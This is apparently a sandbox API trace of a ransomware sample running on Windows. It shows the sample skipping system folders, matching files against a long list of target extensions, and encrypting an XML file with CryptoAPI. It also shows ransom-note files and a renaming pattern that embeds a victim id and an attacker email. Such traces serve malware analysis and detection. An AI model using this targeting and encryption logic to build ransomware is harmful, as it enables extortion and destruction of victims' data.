	[0178.843] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="application data") returned 0x0
	[0178.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.844] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="winnt") returned 0x0
	[0178.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.844] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="tmp") returned 0x0
	[0178.844] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.845] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="cache") returned 0x0
	[0178.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.845] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.845] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.846] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="webcache") returned 0x0
	[0178.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.846] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="inetcache") returned 0x0
	[0178.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.846] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="nvidia") returned 0x0
	[0178.846] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.846] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="packages") returned 0x0
	[0178.847] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.847] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="cookies") returned 0x0
	[0178.847] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.847] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="programdata") returned 0x0
	[0178.847] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.847] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.847] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x841feb26, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.847] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.848] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841d8d54, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x841d8d54, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x841feb26, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.848] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841d8d54, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x841d8d54, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x841d8d54, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.848] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x745891c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 1
	[0178.848] lstrcmpW (lpString1="UpdateStore", lpString2="..") returned 1
	[0178.848] lstrcmpW (lpString1="UpdateStore", lpString2=".") returned 1
	[0178.848] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\USOPrivate" | out: lpString1="C:\\Users\\All Users\\USOPrivate") returned="C:\\Users\\All Users\\USOPrivate"
	[0178.848] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\") returned="C:\\Users\\All Users\\USOPrivate\\"
	[0178.848] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate\\", lpString2="UpdateStore" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore"
	[0178.848] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\USOPrivate\\UpdateStore" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore"
	[0178.849] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\"
	[0178.849] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\"
	[0178.849] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*"
	[0178.849] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x745891c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.849] lstrlenW (lpString="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*") returned 45
	[0178.849] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.850] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\usoprivate\\updatestore\\*.*") returned 0x2d
	[0178.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.850] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="windows") returned 0x0
	[0178.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.850] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="boot") returned 0x0
	[0178.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.850] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="system volume information") returned 0x0
	[0178.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.851] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.851] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="temp") returned 0x0
	[0178.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.851] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="program files") returned 0x0
	[0178.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.852] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.852] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="appdata") returned 0x0
	[0178.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.852] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="application data") returned 0x0
	[0178.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.852] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="winnt") returned 0x0
	[0178.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.852] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="tmp") returned 0x0
	[0178.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.853] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="cache") returned 0x0
	[0178.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.853] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.853] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="webcache") returned 0x0
	[0178.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.854] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="inetcache") returned 0x0
	[0178.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.854] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="nvidia") returned 0x0
	[0178.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.854] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="packages") returned 0x0
	[0178.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.854] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="cookies") returned 0x0
	[0178.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.855] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\*.*", lpSrch="programdata") returned 0x0
	[0178.855] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x745891c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.855] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x7440ba2d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x0, dwReserved1=0x0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", cAlternateFileName="UPDATE~1.XML")) returned 1
	[0178.855] lstrcmpW (lpString1="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", lpString2="..") returned 1
	[0178.855] lstrcmpW (lpString1="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", lpString2=".") returned 1
	[0178.855] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\"
	[0178.855] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\", lpString2="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"
	[0178.855] lstrlenW (lpString="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned 93
	[0178.856] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.856] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", cchLength=0x5d | out: lpsz="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned 0x5d
	[0178.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.856] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0178.856] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" | out: lpString1="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"
	[0178.856] lstrlenW (lpString="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml") returned 93
	[0178.856] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.857] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0178.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.857] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0178.857] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.857] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.858] CreateFileW (lpFileName="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0178.858] ReadFile (in: hFile=0x388, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x349, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18b350*=0x349, lpOverlapped=0x0) returned 1
	[0178.858] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.858] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb880) returned 1
	[0178.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.870] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0178.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.870] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0178.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.870] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9070) returned 1
	[0178.870] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.870] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x349, dwBufLen=0x349 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x350) returned 1
	[0178.871] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.871] RtlMoveMemory (in: Destination=0xfdd180, Source=0xfdc138, Length=0x349 | out: Destination=0xfdd180) 
	[0178.871] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.871] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd180*, pdwDataLen=0x18aefc*=0x349, dwBufLen=0x350 | out: pbData=0xfdd180*, pdwDataLen=0x18aefc*=0x350) returned 1
	[0178.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.872] CryptDestroyKey (hKey=0xfb9070) returned 1
	[0178.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.872] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0178.872] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.872] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0178.873] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.873] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.873] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.873] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0178.874] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\usoprivate\\updatestore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 135
